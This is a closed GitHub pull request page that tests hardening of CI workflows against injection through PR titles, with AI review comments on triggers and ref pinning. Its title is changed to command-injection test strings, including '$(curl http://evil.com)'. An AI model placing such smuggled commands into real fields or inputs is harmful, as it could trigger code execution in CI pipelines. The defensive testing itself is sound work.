Skip to content

$(curl http://evil.com) - #625

Closed
GAdityaVarma wants to merge 1 commit into
mainfrom
test/verify-pr-workflows
Closed

GAdityaVarma wants to merge 1 commit into
mainfrom
test/verify-pr-workflows

Conversation

@GAdityaVarma

@GAdityaVarma GAdityaVarma commented Apr 8, 2026 •

Copy link
Copy Markdown
Contributor

Testing PR workflow security hardening

tested as part of https://progresssoftware.atlassian.net/browse/PDP-1182 jira

Copilot AI review requested due to automatic review settings April 8, 2026 15:14
@GAdityaVarma GAdityaVarma changed the title PDP-1182 Test PR workflow security hardening Test PR workflow security hardening Apr 8, 2026

Copilot AI left a comment

Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Pull request overview

Adds a temporary GitHub Actions workflow to exercise the organization’s reusable PR checks as part of “PR workflow security hardening” testing.

Changes:

  • Introduces a new PR-triggered workflow to run the reusable JIRA ID check workflow.
  • Introduces a new PR-triggered workflow to run the reusable copyright check workflow with elevated PR/issue permissions.

💡 Add Copilot custom instructions for smarter, more guided reviews. Learn how to get started.

name: Test PR Workflows (TEMPORARY - DELETE AFTER TESTING)

on:
pull_request:

Copilot AI Apr 8, 2026

Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This workflow is triggered on pull_request, but the repo’s main PR workflow uses pull_request_target specifically to support PRs from forks (.github/workflows/pr-workflow.yaml:4-6). With pull_request, GITHUB_TOKEN is read-only on fork PRs, so the test-copyright-check job won’t actually receive the requested pull-requests: write / issues: write permissions and the reusable workflow may fail to comment/update checks. Consider using pull_request_target (with the reusable workflow designed to avoid checking out untrusted code) if you need this to behave like the main PR workflow.

Suggested change
pull_request:
pull_request_target:

Copilot uses AI. Check for mistakes.
Comment on lines +10 to +16
uses: marklogic/pr-workflows/.github/workflows/jira-id-check.yml@fix/SECCMP-1797-pwn-request-injection
with:
pr-title: ${{ github.event.pull_request.title }}

test-copyright-check:
name: Test Copyright Check
uses: marklogic/pr-workflows/.github/workflows/copyright-check.yml@fix/SECCMP-1797-pwn-request-injection

Copilot AI Apr 8, 2026

Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

The reusable workflows are referenced via a mutable branch ref (@fix/SECCMP-1797-pwn-request-injection). For workflow security hardening, pin reusable workflow calls to an immutable ref (a commit SHA or a protected, versioned tag) to avoid supply-chain risk if the branch changes.

Suggested change
uses: marklogic/pr-workflows/.github/workflows/jira-id-check.yml@fix/SECCMP-1797-pwn-request-injection
with:
pr-title: ${{ github.event.pull_request.title }}
test-copyright-check:
name: Test Copyright Check
uses: marklogic/pr-workflows/.github/workflows/copyright-check.yml@fix/SECCMP-1797-pwn-request-injection
uses: marklogic/pr-workflows/.github/workflows/jira-id-check.yml@<FULL_40_CHAR_COMMIT_SHA_FOR_fix/SECCMP-1797-pwn-request-injection>
with:
pr-title: ${{ github.event.pull_request.title }}
test-copyright-check:
name: Test Copyright Check
uses: marklogic/pr-workflows/.github/workflows/copyright-check.yml@<FULL_40_CHAR_COMMIT_SHA_FOR_fix/SECCMP-1797-pwn-request-injection>

Copilot uses AI. Check for mistakes.
Comment on lines +4 to +5
pull_request:
types: [opened, edited, reopened, synchronize]

Copilot AI Apr 8, 2026

Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This file is labeled as TEMPORARY but is wired to run on every PR event type listed. If it’s only for ad-hoc validation, consider gating it (e.g., workflow_dispatch, branch/actor filtering, or a short-lived test branch) to avoid duplicating checks and increasing Actions noise/cost if merged accidentally.

Suggested change
pull_request:
types: [opened, edited, reopened, synchronize]
workflow_dispatch:

Copilot uses AI. Check for mistakes.
@GAdityaVarma GAdityaVarma changed the title Test PR workflow security hardening "; echo INJECTED; "PDP-1182 Apr 8, 2026
@GAdityaVarma GAdityaVarma changed the title "; echo INJECTED; "PDP-1182 $(curl http://evil.com) Apr 8, 2026
@GAdityaVarma
GAdityaVarma deleted the test/verify-pr-workflows branch April 8, 2026 15:38
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

2 participants